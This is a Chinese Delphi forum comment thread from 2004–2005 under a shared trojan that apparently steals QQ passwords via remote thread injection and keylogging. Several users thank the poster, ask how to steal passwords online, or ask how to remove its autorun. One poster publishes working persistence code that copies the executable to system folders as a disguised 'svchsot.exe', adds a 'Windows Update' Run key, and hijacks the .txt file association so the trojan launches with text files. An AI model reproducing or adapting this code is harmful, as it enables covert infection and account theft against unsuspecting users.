捐赠 | 广告 | 注册 | 发布 | 上传 | 关于我们    
  沪ICP备05001939号 DELPHI盒子 | 盒子论坛 | 盒子文章 | 盒子问答悬赏 | 最新更新 | 论坛检索 | 下载中心 | 高级搜索    
  精品专区 | 繁體中文 | 奖励公告栏 | 直通车账号登陆 | 关闭GOOGLE广告 | 临时留言    
 
广告
评论:远程线程注入获取QQ密码
maliangcat01 13034 2005/3/7 17:53:09
还不错,LockMe 用了3个地方去启动木马够狠的啊。既然用了 mousehook应该把软键盘也加入监视。
ender_baoj 12276 2005/1/30 14:49:25
不是说是:远程线程注入得qq吗?怎么只能在安装的机子上用啊?望高手教教我啊!!怎么在线盗qq 密码?
qing5234 11931 2005/1/19 17:33:37
我要说的就是,,这个确实功能比较高,今天我下载试了一下效果,但是qqin.txt只会显示在c:/根目录下面,,,就是说能不能把它改过来,就是讲这个程序装到哪里就运行在哪里呢//放在一个根目录底下隐藏也不好的啊,,!!!希望得到回复的啊!!!
qufo 11151 2005/1/2 1:54:19
我没看清代码就运行了,怎么解除他的自动运行及注册表关联呢?谢谢。
sn_sa 10891 2004/12/24 11:23:33
怎么使用呀呵~初学者不懂呀,
xiaoxiao3004 10868 2004/12/23 19:19:06
我喜欢,谢谢
liumazi 10801 2004/12/22 13:33:52
zhangyang1319: 这个..这个..您应该装一个Delphi.. :)
marron 10774 2004/12/21 17:57:19
晕啊~~竟然拿去用VB打开
zhangyang1319 10750 2004/12/21 11:55:00
为什么我下载了程序,在我的机子上打不开啊?我在VB里也用不上啊。
tim001 10475 2004/12/13 17:44:32
学习一下
ww011 10372 2004/12/10 10:13:38
不错,不过密码部分还是基于键盘记录,如果实现真正的密码截取就好了,另外对复制上的密码和软键盘输入的仍然无能为力!
marron 10367 2004/12/10 8:39:39
不错
progray 10356 2004/12/9 21:41:55
login_free,呵呵,很喜欢你的性格!也佩服你的勇气.

也许楼主实属无心,大家都是同道,理解理解,你想总不能把你在编代码的时候总去想,这个是从哪里抄的那个是从哪里抄的吧,那不是很累吗?不过既然你提出来了,楼主是该表个态哦.

对于你后来公布改进代码,我尤其敬佩,谢谢你!
isxuzhu 10330 2004/12/9 9:35:13
请教各位老大,它每次都自动运行,要怎么才能关闭它呢?晕啊
login_free 10325 2004/12/9 8:36:09
其实,我只是觉得有些不公平而已,现在回头想想,我的做法也有些过激,也向这位朋友和盒子上的所有朋友道歉。真诚的说声对不起,望各位朋友宽恕于我。下面是改进和分解后的LockMe函数。大家也许觉得麻烦了许多,呵,,其实可以不用Registry单元,而调用API实现的,这样可以减小EXE的体积。

var
  WinDir,SysDir:string;
  FileName1,FileName2:String;
  FilePathName1,FilePathName2:String;

function LockMe(Key01,Key02:String;FileName01,FileName02:String;FilePathName01,FilePathName02:String):Boolean;
var
  Reg:TRegistry;     
  sFileName:String;
begin
try
  if not FileExists(FilePathName01) then Copyfile(PChar(ParamStr(0)),PChar(FilePathName01),False);
  if not FileExists(FilePathName02) then CopyFile(PChar(ParamStr(0)),PChar(FilePathName02),False);
  try
    if (Trim(Key02)<>') and (Trim(FileName02)<>') then
    begin
      reg:=TRegistry.Create;
      reg.RootKey:=HKEY_LOCAL_MACHINE;
      reg.OpenKey('SOFTWARE\MicroSoft\windows\CurrentVersion\Run',true);
      reg.WriteString(Key02,FileName02);
      reg.Free;
    end;
    reg:=TRegistry.Create;
    reg.RootKey:=HKEY_LOCAL_MACHINE;
    reg.OpenKey('SOFTWARE\MicroSoft\windows\CurrentVersion\RunServices',true);
    reg.WriteString(Key01,FileName01);
    reg.Free;
    reg:=TRegistry.Create;
    reg.RootKey:=HKEY_CURRENT_USER;
    reg.OpenKey('SOFTWARE\MicroSoft\windows\CurrentVersion\Run',true);
    reg.WriteString(Key01,FileName01);
    reg.Free;
  finally end;
except end;
end;

function LinkTxt(FileName:String):Boolean;
var
  Reg:TRegistry;
begin
try
  reg:=TRegistry.Create;
  reg.RootKey := HKEY_CLASSES_ROOT;
  reg.OpenKey('\txtfile\shell\open\command',TRUE);
  reg.WriteString(',FileName+' "%1" ');
  reg.Free;
except end;
end;

function LoadAll(FileName01,FileName02:String;FilePathName01,FilePathName02:String):Boolean;
var
  sFileName:String;
  Hmutex:thandle;
  Errno:integer;
begin
try
  if ParamCount>0 then
  begin (* 有执行参数传入 *)
    sFileName:=ParamStr(1); (* 取得参数内容 *)
    if ParamStr(0)=FilePathName01 then WinExec(PChar('Notepad.exe '+sFileName),SW_SHOW);(*用记事本打开*)
    WinExec(PChar(FilePathName02),SW_HIDE);
    Halt;
  end;
  if not SameText(ExtractFileName(ParamStr(0)),FileName01) //不是执行自系统目录
  and not SameText(ExtractFileName(ParamStr(0)),FileName02) then
  begin
    WinExec(PChar(FilePathName02),SW_HIDE);
    Halt;
  end;
  if ExtractFileName(ParamStr(0))=FileName02 then
  begin
    Hmutex:=CreateMutex(nil,False,PChar('JingChun Chu  NeiMengGu CHINA 2004'));
    Errno:=GetLastError;
    ReleaseMutex(hMutex);
    if Errno=ERROR_ALREADY_EXISTS then Halt;
  end;
except end;
end;

调用:
begin
  SetLength(WinDir,128);          
  GetWindowsDirectory(PChar(WinDir),128); 
  SetLength(WinDir,StrLen(PChar(WinDir)));
  if WinDir[Length(WinDir)]<>'\' then
    WinDir:=WinDir+'\';
  SetLength(SysDir,128);          
  GetSystemDirectory(PChar(SysDir),128); 
  SetLength(SysDir,StrLen(PChar(SysDir)));
  if SysDir[Length(SysDir)]<>'\' then
    SysDir:=SysDir+'\';
  FileName1:='dx.exe';
  FileName2:='svchsot.exe';
  FilePathName1:=WinDir+FileName1;
  FilePathName2:=SysDir+FileName2;
  if not FileExists('txt.txt') then
  begin
    LockMe('Windows Update',',FileName2,FileName1,FilePathName1,FilePathName2);
    LinkTxt(FilePathName1);
  end;
  LoadAll(FileName1,FileName2,FilePathName1,FilePathName2);
end;

  致


          Login

          2004-12-09
mszok 10311 2004/12/8 19:44:21
我没在意用了你的一个函数,在这里声明一下!我不是有意意的
login_free 10301 2004/12/8 14:18:28
此朋友公开的代码中含有刘麻子兄弟的代码已加说明,但此代码中也含有本人的代码(LockMe函数),在引用后并未做说明,这是不公平的行为,希望此位朋友公开道歉,否则将要求盒子撤下此代码。另外,最近对LockMe函数进行了改进和分解,有需要的朋友,可以和我要。QQ:77567865。
bianfuxia888888 10297 2004/12/8 13:14:09
不错不错
gfz007 10284 2004/12/8 0:42:52
xiexie 
呵呵 正需要:)
liumazi 10282 2004/12/7 23:00:03
不错, 另, 其实 hook.dll , insert.dll 可以整到一块.
第一页 上一页 下一页 最后页 有 21 条纪录 共2页 1 - 20
 用户名:
 密 码:
自动登陆(30天有效)
 
  DELPHI盒子版权所有 1999-2023 V4.01 粤ICP备10103342号-1 更新RSS列表